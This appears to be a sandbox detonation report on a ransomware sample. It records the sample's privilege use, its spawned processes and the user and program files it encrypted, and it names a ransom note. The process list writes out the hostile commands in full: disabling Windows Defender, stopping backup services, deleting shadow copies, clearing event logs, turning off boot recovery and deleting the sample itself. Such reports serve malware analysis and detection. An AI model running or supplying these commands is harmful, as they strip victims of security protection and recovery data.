| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe
"C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\notepad.exe
notepad.exe C:\JPjx_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 2057eb96bec135be8837ae1c06d690cd |
| SHA1 | 7338c0d78bfa530d95972b5e8f929ad72fb96e76 |
| SHA256 | 5219d7a72d4e31ce477b407acac0bbf6dc0740faa5504e8a8a5033db2004898b |
| SHA512 | 3f99ec239b619d52c6a8b0204642a2e0b448c25b9cbdd72db2b14300f9ee552cd596c2a0205462184de288e00a1dc0b2d6af6a14bc0fb1989daafc31f9d5bf2a |
C:\JPjx_HOW_TO_DECRYPT.txt
| MD5 | 033e7a5b6b35dee5b4c7095f87fadce7 |
| SHA1 | ea860a57baa649fd49c99db6ebe42e50b93cb3a6 |
| SHA256 | d6ee6632a475bb56c9901d51433a559799da80ab21560328190e9d5ece969d19 |
| SHA512 | 36dd4a2521c9345c6d13c5d8673008c2d1973a50f46c43146c24bf60cee40b85d96059687514116745f2dd807d6c57d3abc84f29b108205f65c877437e04face |
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-04 13:56
Reported
2022-03-04 13:58
Platform
win10v2004-en-20220113
Max time kernel
152s
Max time network
141s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\ApproveUnblock.crw.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_GgAAABoAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CompleteApprove.tif.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\FindInstall.tif.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\StepSkip.png => C:\Users\Admin\Pictures\StepSkip.png.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\StepSkip.png.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UndoTrace.png => C:\Users\Admin\Pictures\UndoTrace.png.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ApproveUnblock.crw => C:\Users\Admin\Pictures\ApproveUnblock.crw.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_GgAAABoAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\FindInstall.tif => C:\Users\Admin\Pictures\FindInstall.tif.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UndoTrace.png.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CompleteApprove.tif => C:\Users\Admin\Pictures\CompleteApprove.tif.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-96_altform-lightunplated_devicefamily-colorfulunplated.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTrial-ul-oob.xrm-ms.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_FgAAABYAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\AppPackageBadgeLogo.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-white\LargeTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupWideTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\tinytile.targetsize-48_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-80_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hr-hr\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\WinRTUtils.winmd | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Bark.jpg | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\SmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeMedTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-16_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_targetsize-20_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Internet Explorer\es-ES\iexplore.exe.mui.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\br.txt.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_KAAAACgAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-execution.xml.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription5-ppd.xrm-ms.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_OgAAADoAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_FAAAABQAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-ul-phn.xrm-ms.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_DgAAAA4AAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTile.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-gb\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
